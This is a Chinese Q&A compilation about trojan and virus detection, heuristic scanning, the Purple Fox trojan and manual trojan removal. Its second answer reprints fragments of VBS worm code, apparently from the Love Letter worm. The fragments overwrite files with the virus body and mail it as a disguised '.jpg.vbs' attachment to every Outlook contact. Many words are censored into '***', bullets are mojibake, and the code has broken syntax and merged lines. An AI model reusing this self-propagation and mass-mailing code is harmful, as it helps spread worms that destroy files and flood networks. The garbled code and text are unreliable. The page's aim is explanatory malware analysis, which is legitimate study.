文章大纲：

• 1、怎样鉴别木马病毒？
• 2、[250分的问题]关于病毒样本和病毒分析和病毒分析工具、 ***
• 3、什么是启发型木马病毒？
• 4、什么是紫狐木马病毒？
• 5、电脑高手帮分析一下这个Trojan Horse是什么病毒啊
• 6、常见的木马病毒有哪些

怎样鉴别木马病毒？

愿我的答案 能够解决您的烦忧

检测电脑是否中毒更好的办法自然就是用杀毒软件检测了

直接用杀毒软件扫描一下，就知道你电脑到底有没有中毒了

1，下载腾讯电脑管家“8.11”最新版

2，打开杀毒页面开始查杀，切记要打开小红伞引擎。如果普通查杀不能解决问题，您可以打开腾讯电脑管家---杀毒——全盘杀毒- 进行深度扫描。

3，查杀处理完所有病毒后，立刻重启电脑，再进行一次安全体检，清除多余系统缓存文件，避免二次感染。

如果您对我的答案不满意，可以继续追问或者提出宝贵意见，谢谢

[250分的问题]关于病毒样本和病毒分析和病毒分析工具、 ***

1病毒样本要从哪里来

就病毒代码的存在形式来说，有两种，一种是病毒自身是个独立的程序文件，另一种是它附着在正常的程序文件上，即所谓的感染，所以，病毒样本其实就是指怀疑为病毒或染毒的文件

不过实际上，病毒程序并不一定象你说的那样清清楚楚的有个主程序，现在的病毒木马，都是几个程序文件组成，相互保护、相互调用运行，它们都是病毒样本

病毒的发作状态，有些是能察觉出来的，比如：增加了进程、电脑速度或网速变慢、系统运行报错等等，有些病毒发作时，几乎没有外在表现，很隐蔽

病毒其实就是一段程序，一是一，二是二，一点也不可怕和神秘，只要不运行它，它就是死的，非常安全，如果你怕在提取过程中误运行了病毒，可以把病毒程序文件的扩展名改一下，改为不可被执行或被直接打开的扩展名即可，或根本就不要扩展名，这样在拷贝、传输过程中就非常安全了

2要怎么分析

（1）（病毒分析祥解）

（2）一、Vbs脚本病毒的特点及发展现状

VBS病毒是用VB Script编写而成，该脚本语言功能非常强大，它们利用Windows系统的开放性特点，通过调用一些现成的Windows对象、组件，可以直接对文件系统、注册表等进行控制，功能非常强大。应该说病毒就是一种思想，但是这种思想在用VBS实现时变得极其容易。VBS脚本病毒具有如下几个特点：

1．编写简单，一个以前对病毒一无所知的病毒爱好者可以在很短的时间里编出一个新型病毒来。

2．破坏力大。其破坏力不仅表现在对用户系统文件及性能的破坏。他还可以使邮件服务器崩溃， *** 发生严重阻塞。

3．感染力强。由于脚本是直接解释执行，并且它不需要像PE病毒那样，需要做复杂的PE文件格式处理，因此这类病毒可以直接通过自我复制的方式感染其他同类文件，并且自我的异常处理变得非常容易。

4．传播范围大。这类病毒通过htm文档，Email附件或其它方式，可以在很短时间内传遍世界各地。

5．病毒源码容易被获取，变种多。由于VBS病毒解释执行，其源代码可读性非常强，即使病毒源码经过加密处理后，其源代码的获取还是比较简单。因此，这类病毒变种比较多，稍微改变一下病毒的结构，或者修改一下特征值，很多杀毒软件可能就无能为力。

6．欺骗性强。脚本病毒为了得到运行机会，往往会采用各种让用户不大注意的手段，譬如，邮件的附件名采用双后缀，如.jpg.vbs，由于系统默认不显示后缀，这样，用户看到这个文件的时候，就会认为它是一个jpg图片文件。

7．使得病毒生产机实现起来非常容易。所谓病毒生产机，就是可以按照用户的意愿，生产病毒的机器（当然，这里指的是程序），目前的病毒生产机，之所以大多数都为脚本病毒生产机，其中最重要的一点还是因为脚本是解释执行的，实现起来非常容易，具体将在我们后面谈及。

正因为以上几个特点，脚本病毒发展异常迅猛，特别是病毒生产机的出现，使得生成新型脚本病毒变得非常容易。

二、Vbs脚本病毒原理分析

1．vbs脚本病毒如何感染、搜索文件

VBS脚本病毒一般是直接通过自我复制来感染文件的，病毒中的绝大部分代码都可以直接附加在其他同类程序的中间，譬如新欢乐时光病毒可以将自己的代码附加在.htm文件的尾部，并在顶部加入一条调用病毒代码的语句，而爱虫病毒则是直接生成一个文件的副本，将病毒代码拷入其中，并以原文件名作为病毒文件名的前缀，vbs作为后缀。下面我们通过爱虫病毒的部分代码具体分析一下这类病毒的感染和搜索原理：

以下是文件感染的部分关键代码：

Set fso=createobject("scripting.filesystemobject") '创建一个文件系统对象

set self=fso.opentextfile(wscript.scriptfullname,1) '读打开当前文件（即病毒本身）

vbscopy=self.readall ' 读取病毒全部代码到字符串变量vbscopy……

set ap=fso.opentextfile(目标文件.path,2,true) ' 写打开目标文件，准备写入病毒代码

ap.write vbscopy ' 将病毒代码覆盖目标文件

ap.close

set cop=fso.getfile(目标文件.path) '得到目标文件路径

cop.copy(目标文件.path ".vbs") ' 创建另外一个病毒文件（以.vbs为后缀）

目标文件.delete(true) '删除目标文件

上面描述了病毒文件是如何感染正常文件的：首先将病毒自身代码赋给字符串变量vbscopy，然后将这个字符串覆盖写到目标文件，并创建一个以目标文件名为文件名前缀、vbs为后缀的文件副本，最后删除目标文件。

下面我们具体分析一下文件搜索代码：

'该函数主要用来寻找满足条件的文件，并生成对应文件的一个病毒副本

sub scan(folder_) 'scan函数定义，

on error resume next '如果出现错误，直接跳过，防止弹出错误窗口

set folder_=fso.getfolder(folder_)

set files=folder_.files ' 当前目录的所有文件 ***

for each file in filesext=fso.GetExtensionName(file) '获取文件后缀

ext=lcase(ext) '后缀名转换成小写字母

if ext="mp5" then '如果后缀名是mp5，则进行感染。请自己建立相应后缀名的文件，更好是非正常后缀名 ，以免破坏正常程序。

Wscript.echo (file)

end if

next

set subfolders=folder_.subfolders

for each subfolder in subfolders '搜索其他目录；递归调用

scan( )

scan(subfolder)

next

end sub

上面的代码就是VBS脚本病毒进行文件搜索的代码分析。搜索部分scan( )函数做得比较短小精悍，非常巧妙，采用了一个递归的算法遍历整个分区的目录和文件。

2．vbs脚本病毒通过 *** 传播的几种方式及代码分析

VBS脚本病毒之所以传播范围广，主要依赖于它的 *** 传播功能，一般来说，VBS脚本病毒采用如下几种方式进行传播：

1）通过Email附件传播

这是一种用的非常普遍的传播方式，病毒可以通过各种 *** 拿到合法的Email地址，最常见的就是直接取outlook地址簿中的邮件地址，也可以通过程序在用户文档（譬如htm文件）中搜索Email地址。

下面我们具体分析一下VBS脚本病毒是如何做到这一点的：

Function mailBroadcast()

on error resume next

wscript.echo

Set outlookApp = CreateObject("Outlook.Application") //创建一个OUTLOOK应用的对象

If outlookApp= "Outlook" Then

Set mapiObj=outlookApp.GetNameSpace("MAPI") //获取MAPI的名字空间

Set addrList= mapiObj.AddressLists //获取地址表的个数

For Each addr In addrList

If addr.AddressEntries.Count 0 Then

addrEntCount = addr.AddressEntries.Count //获取每个地址表的Email记录数

For addrEntIndex= 1 To addrEntCount //遍历地址表的Email地址

Set item = outlookApp.CreateItem(0) //获取一个邮件对象实例

Set addrEnt = addr.AddressEntries(addrEntIndex) //获取具体Email地址

item.To = addrEnt.Address //填入收信人地址 item.Subject = "病毒传播实验" //写入邮件标题

item.Body = "这里是病毒邮件传播测试，收到此信请不要慌张！" //写入文件内容

Set attachMents=item.Attachments //定义邮件附件

attachMents.Add fileSysObj.GetSpecialFolder(0) "\test.jpg.vbs"

item.DeleteAfterSubmit = True //信件提交后自动删除

If item.To "" Then

item.Send //发送邮件

shellObj.regwrite "HKCU\software\Mailtest\mailed", "1" //病毒标记，以免重复感染

End If

Next

End If

Next

End if

End Function

太多了~你能不能自己去看？百度发不来~还有250分

什么是启发型木马病毒？

启发式究竟指什么―启发式‖（Heuristic）是指探索和发现的行为或过程。牛津英文词典将启发式定义为―让某人能够自主的探索和学习‖或者（在计算领域）―仅依靠宽泛的定义，或者依靠不断尝试和汲取失败经验教训的 *** 来解决问题[6]。‖韦氏词典将其定义为―依靠实验尤其是反复试验，通过尝试和汲取失败经验教训的 *** ，来帮助学习、探索或者解决问题‖或者（在计算领域）―一种利用自主学习的手段（通过反馈的评估）来提高表现，以探索解决问题的技术[7]。‖ 启发式程序通常被认为是一种具有人工智能的应用程序，而且也是一种解决问题的工具。启发式程序的编写，例如用于专门系统的程序，建立于一些从经验中提取的规则，它通过不断积累经验产生更好的解决 *** ，并且增加自己的知识库。

当启发式分析被用于处理恶意软件时（当然还包括垃圾邮件和流氓软件），尽管涉及反复试验和从经验中学习的原理，却又有更多限定的含义。启发式分析使用基于规则的 *** 来诊断一个有潜在威胁的文件(或信息，如果是分析垃圾邮件的话)。分析引擎的工作是基于自身规则库的，它依据规则检查恶意软件存在的可能性，当找到一个匹配的规则时就为其分配一个分值。如果这些分值达到或超过了一个阈值[8]，这个文件就会被标记为可疑文件（或者潜在的恶意软件、垃圾邮件）并进行处理。 某种意义上来说，针对反恶意软件的启发式技术，尝试的是模拟人类的智能分析 *** 。与恶意软件分析人员设法判定某个软件的行为和动作相同，启发式分析执行相同的智能决策过程，有效地担当虚拟分析师的角色。恶意软件分析人员从出现的新生威胁中不断学习，并将他的知识通过编程应用于启发式分析器，以提高今后的检测率。

启发式编程在反病毒软件性能中有着双重的任务：速度和检测。事实上，―启发式‖这个术语在其他科学领域也有类似的含义[9]；即专注于通过达到―足够好‖的结果(尤其指数据吞吐速度)而非―完美的‖结果来提高性能。当已知病毒的数量与日俱增，就需要提高检测速度。否则，增长的恶意软件数量所带来额外扫描时间，会降低系统的使用效率。 否定式启发

一种检测规则或标准，如果检测对象符合标准，则不是病毒或恶意软件的可能性减小。肯定式启发

一种检测规则或标准，如果检测对象符合标准，则是病毒或恶意软件的可能性加大。 误杀漏杀原因争论的焦点在于，判断一个程序是不是木马程序（或恶意软件），是否应更多根据其目的来界定，而非功能来界定。例如，一个键盘记录程序如果是经过用户授权或用户自愿安装的，即使它的功能与木马程序是相同的，那么它也不算是木马程序。这会给检测带来问题，因为电脑在判断目的方面的能力弱于人类。

间谍软件和广告软件（可能由于媒体的过多关注，以及大量针对性产品的存在）已经被划分为了不同恶意软件的子类。尽管人们经常争论，广告软件不一定就是恶意软件，但这种区别是大多情况下没有意义的。而同样的争论也适用于该类别的几乎所有其他项目，因为一个程序的行为并不能作为判定恶意软件的标准，而是在于程序员的不良意图与用户期望值之间存在着的差别。 病毒三大类文件病毒

期待反病毒软件检测病毒，当然是合情合理的。因为多年来反病毒软件在检测病毒方面如此成功，也正是由于这部分原因，以至于它检测其它类型恶意软件的能力被低估了。

虽然病毒有很多种定义，但一种被恶意软件研究者普遍接受的定义是―病毒是一种计算机程序，它能通过将复制自身（或者自身的变体）修改计算机中的其他程序，以达到感染目的‖ [1， 2]。 这个定义涵盖了很多种类型的病毒，包括：

�8�4 引导型病毒，硬盘分区病毒

�8�4 文件型病毒（寄生病毒）

�8�4 混合型病毒

�8�4 宏病毒和脚本病毒尽管有些病毒类型现在已经很少见了（比如引导型病毒和硬盘分区病毒），但是反病毒程序一般都能检测在该平台上（有时包括其它平台）发现的这类已知病毒。通常，反病毒软件也善于通过启发式的方式检测新的或未知的病毒种类。蠕虫

业界从未在蠕虫的定义上真正地达成一致，如科恩所说―蠕虫是一种病毒的特例‖ [1]，但不论蠕虫是怎样的特例，反病毒软件通常都能检测它们。 对于蠕虫的不同定义甚至比针对病毒的还要多，但是大部分反病毒研究者将蠕虫定义为一种以非寄生方式复制的程序，也就是说，它不把它自身附加到一个寄主文件上。邮件群发者可以描述为一种特殊类型的蠕虫. 多数反病毒厂商将这种通过电子邮件传播的恶意软件视为蠕虫，但是一些邮件群发者具有纯病毒的特点（比如，Melissa事实上是一种纯病毒，一种能够像蠕虫一样传播的宏病毒，而W32/Magistr则是一种文件型病毒）。 对于新型蠕虫变种的检测，厂商同样有很好的手段。比如说，新型邮件群发器几乎在出现的同时，就被通信安全服务供应商及其系统列入了黑名单.

非复制型恶意软件

这个定义是根据上文的定义得出来的，即如果一个恶意软件不具有复制能力，那它就不是病毒或者蠕虫。但是这并不意味着反病毒软件不能检测到它，除非其不具有威胁。

要说明的是，即使当反病毒厂商过去常以非复制型的对象不是病毒为由拒绝对它们的检测时，一些非自我复制的对象（它们当中的一些甚至不是可执行程序，更不要说是有恶意的了）仍然能被检测到并且报毒。例如：�8�4 未遂病毒(复制自身失败的病毒)和损坏的病毒

�8�4 垃圾文件

�8�4 与病毒相关的非病毒程序，如病毒原体，释放器，病毒生成器

�8�4 合法的测试程序如EICAR测试文件[4]

许多已传播多年的非复制型病毒，由于管理不善，仍然被一些评测机构作为样本，用于针对杀毒软件的测试中。绝大部分厂商早已不再拒绝将这些病毒的特征码添加到其产品的病毒库中，避免因没有检测出这些病毒样本，而取得不理想的测试成绩。遗憾的是，日趋复杂的启发式扫描引擎，也只是刚好跟上了杀毒软件测试者不断更新的测试手段，有时新的测试手段也并非恰当。本文的后面部分会简略地分析测试产品启发式扫描能力时，技术上可接受的方式。 人们了解最多的非复制型恶意软件是木马程序（或简称为木马）。木马程序声称能执行一些有用的操作或提供一些必要的功能，可能也确实如此。但同时它也会执行一些用户并不希望或不需要的操作。这包括一系列特定的恶意软件：

�8�4 病毒释放器；

�8�4 键盘记录器；

�8�4 破坏性木马程序；

�8�4 下载者；

�8�4 间谍程序；

�8�4 广告程序；

�8�4 内核后门与stealthkits

�8�4 玩笑程序；

�8�4 僵尸程序 (机器人程序， 远程控制木马， DDoS 客户端等)

可自我复制的恶意软件（如病毒）有时也被认为是木马程序（或称为木马型病毒，这表示这种木马通过将一个以前合法的程序损坏，修改或替换而引起破坏），大部分人可能会发现这样的分类所带来的困惑多于帮助。检测出所有非复制型恶意软件要比检测出所有形式的病毒更加困难，因为不仅要测试程序的复制能力，还要测试程序的一系列作用。

什么是紫狐木马病毒？

在下载安装并且使用了某个下载器后，电脑不定期的会被安装，甚至重复安装各种软件，在提取相关文件分析后，我们发现这是一类利用系统正常"Pending

File Rename

Operations"机制替换系统文件，实现开机自动启动加载驱动（自动下载软件）的恶意木马，我们将其命名为"紫狐"。据初步统计，目前至少有三万以上用户中毒。

电脑高手帮分析一下这个Trojan Horse是什么病毒啊

手工彻底清除 PWSteal.Trojan, Trojan horse 木马的 ***

许多电脑用户会经常遇到自己的防毒软件报告发现 PWSteal.Trojan 或者 Trojan horse 这种病毒但却无法清除和隔离它的情况， 或者是在清除后不久它又出现了，让人非常苦恼。这时该怎么办呢？

其实 PWSteal.Trojan 和 Trojan horse 是某些防毒软件对木马的一种统称，它并不代表着固定的一个，而是一类，所以即使遇到同样名子的木马可能它们也并不相同。 费尔托斯特安全是一款可以清除木马和病毒的软件，并且有很强的清除能力，如果您有它的正式版可以在升级到最新病毒库后尝试用它扫描清除一下，但这里需要特别提醒一点： 由于这类木马新变种层出不穷，所以不能保证费尔托斯特安全能够识别出目前所有的或者您遇到的。 那么除此之外难道就没有其他办法了吗？有的，下面就介绍一个借助免费工具“费尔木马强力清除助手”(此工具已经集成到费尔托斯特安全新版本中了)来清除这种顽固性 PWSteal.Trojan, Trojan horse 木马的 *** ：

使用这个 *** 前必须要先知道这个木马的文件名是什么。防毒软件在发现木马后一般都会报告它的完整文件名，您需要先准确的记录下这个文件名。比如：如果防毒软件提示 C:\Windows\hello.dll 是 PWSteal.Trojan 或 Trojan horse，则记下 C:\Windows\hello.dll 这个名子。这里需要注意文件名一定要记准确，因为有许多木马会把自己的文件名故意伪装成和正常的文件名很接近，比如 svch0st.exe(木马)-svchost.exe(正常)、Expl0rer.exe(木马)-Explorer.exe(正常)、intrenat.exe / internet.exe(木马)-internat.exe(正常)等等。特别是数字0几乎和大写字母O一样，很容易让人看错，所以一定要注意区分它们，否则万一记错将有可能把正常的文件清除掉，那就麻烦了；

暂停防毒软件的实时监控，这一点很重要，否则在清除时可能会被阻止而无法成功。比如如果当初是你的诺顿发现了这个木马，那么请先暂停诺顿的实时监控或实时扫描；

下载费尔木马强力清除助手 ；

释放 PowerRmv.zip 到一个目录，然后执行其中的 PowerRmv.exe 启动“费尔木马强力清除助手”。在“文件名”中输入要清除的木马文件名。比如如果您在第1步中记下的文件名是 C:\Windows\hello.dll，那么这时就输入它；

按“清除”。这时程序会询问你是否要举报此病毒到费尔安全实验室，建议点“是”表示同意。接着程序会继续提示是否确定要清除它，仍然选“是”；

之后，如果此木马被成功清除程序会提示成功；或者也可能提示此木马无法被立即删除需要重启电脑。无论是哪种情况请点击“确定”，这时如果您在前面同意了举报此木马那么程序会自动创建并打开一个“病毒举报”的电子邮件，其中会包含这个木马的样本文件，如果您看到了这个邮件请把它直接发送给 virus@filseclab.com 。如果您并没有看到这封邮件也没有关系，可以忽略。

最后，如果程序前面提示了重启电脑后才能清除那么请一定重启您的电脑，在电脑重启后这个木马应该就被清除掉了。

重要提示： 如果您按上面的 *** 操作之后，发现不久这个木马又出现了，并且还是同样的文件名，那么您可以用上面的 *** 再重复执行一次，不过这次操作时请选中程序中的“抑制文件再次生成”选项， 这样清除后一般木马就很难再复活了。这个功能是最新版“费尔木马强力清除助手”中提供的，如果您的没有这个选项，请从上面的地址中重新下载一次。

注意：

“费尔木马强力清除助手”有很强的文件删除能力，清除后的文件将无法再恢复，所以在清除前一定要确定文件名没有输入错误。

如果您按上面的 *** 操作后仍然不能成功清除掉木马，则可能是电脑中还存在着另外一个更主要的木马，在它被清除后会自动从另外一处恢复。这时您需要用防毒软件扫描出所有的这些木马，然后逐一或同时清除才行。

常见的木马病毒有哪些

蠕虫病毒是一种通过 *** 传播的恶性病毒，它除具有病毒的一些共性外，同时具有自己的一些特征，如不利用文件寄生（有的只存在于内存中），对 *** 造成拒绝服务，以及与黑客技术相结合等等。蠕虫病毒主要的破坏方式是大量的复制自身，然后在 *** 中传播，严重的占用有限的 *** 资源，最终引起整个 *** 的瘫痪，使用户不能通过 *** 进行正常的工作。每一次蠕虫病毒的爆发都会给全球经济造成巨大损失，因此它的危害性是十分巨大的；有一些蠕虫病毒还具有更改用户文件、将用户文件自动当附件转发的功能，更是严重的危害到用户的系统安全。

传播方式：

蠕虫病毒常见的传播方式有2种：

1.利用系统漏洞传播——蠕虫病毒利用计算机系统的设计缺陷，通过 *** 主动的将自己扩散出去。

2.利用电子邮件传播——蠕虫病毒将自己隐藏在电子邮件中，随电子邮件扩散到整个 *** 中，这也是是个人计算机被感染的主要途径。

木马病毒:

完整的木马病毒程序一般由两个部分组成，一个是服务器程序，一个是控制程序，被病毒感染的计算机会自动运行服务器程序。如果你的计算机被安放了木马，就如同你的家被人偷偷的装上了后门一样，将变得毫无秘密可言。拥有控制程序的人随时可以检查你的文件，做系统管理员才能做的工作（例如格式化磁盘），你的计算机上的所有文件、程序，以及在你使用到的所有帐号、密码都会被别人轻松的窃走。

传播方式：

木马程序通常通过伪装自己的方式进行传播，常见的伪装方式有： 伪装成小程序，通常会起一个很诱人的的名字，例如“FlashGet破解程序”，用户一旦运行这个程序，就中了木马 伪装成网页，网页的链接通常会起一个十分暧昧的名字，诱使用户去点击它，用户一旦点击了这个链接，就中了木马 把自己绑定在正常的程序上面，高明的黑客可以通过编程把一个正版winzip安装程序和木马编译成一个新的文件，一旦用户安装winzip程序，就会不知不觉地把木马种下去 伪装成邮件附件，邮件主题可能会是“好消息”，“你想赚钱吗？”等等，一旦你好奇的打开附件，木马就安置在了你的计算机中

感染对象： 木马程序感染的对象是整台计算机。